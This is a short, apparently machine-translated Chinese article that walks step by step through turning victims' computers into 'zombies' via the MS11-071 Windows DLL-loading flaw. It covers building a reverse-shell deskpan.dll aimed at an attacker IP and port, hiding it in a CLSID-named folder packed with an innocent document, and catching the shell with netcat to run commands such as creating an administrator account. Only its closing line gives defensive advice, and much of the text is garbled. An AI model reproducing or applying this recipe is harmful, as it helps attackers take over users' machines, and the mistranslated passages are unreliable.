小文件把计算机变成了肉鸡。

漏洞：Windows

脆弱性：黑客的肉鸡

很长一段时间，我们相信。txt，Rtf，.doc这个文件是相对安全的，但使用ms11-071漏洞，这些文件可能是黑客帮凶mdash；mdash；当用户运行后，黑客将触发，产生的特殊文件，Windows的漏洞，导致黑客在肉鸡手中。现在我们要测试的漏洞。

第一步：利用ms11-071.exe到根目录，在C；；；具有菜单；操作；，cmd输入；操作；命令提示符，光标切换到开发程序目录下，进入ms11-071.exe并按下回车键，你可以看到四种开发方案（图1）：

图1

黑客最常用的是第一个和第三个。第一个方法是发送一个壳到指定的港口目标主机，使黑客可以执行任意命令连接后连接。第三种方式是类似于下载当用户触发一个漏洞，下载从对应的URL和运行木马。

STEP2：在第一个例子中，在命令提示符；；进入ms11-071.exe - 1

192.168.1.1 9999（图2），其中192.168.1.1是黑客的计算机的IP地址，9999是开放的端口号。在那之后，生成一个文件名为deskpan.dll。

图2

STEP3：创建一个新文件夹，重命名为：试验。{ 42071714-76d4-11d1-8b2400a0c9068ff3 }，test，和取代它与其他字符。更名后，这两个括号的内容是隐藏的系统，用户只能看到的文件夹名称；testRTF文件创建一个新的。或.doc文件，然后打包压缩文件的deskpan.dll。

图3

在这一点上，产生一个恶意文件的压缩包，这是不够的，而且在使用nc.exe这个小程序，听在命令提示符端口黑客机；NC—输入如下命令；l ndash；P 9999（图3），只要用户在压缩文件中的文件，它会触发该漏洞，黑客将接收来自用户的计算机在壳壳可以执行任意命令，如创建一个管理员帐户。

为了防止此漏洞带来的伤害，我们要做两件事：第一，对系统作一个安全补丁，不运行来历不明的WinRAR压缩包。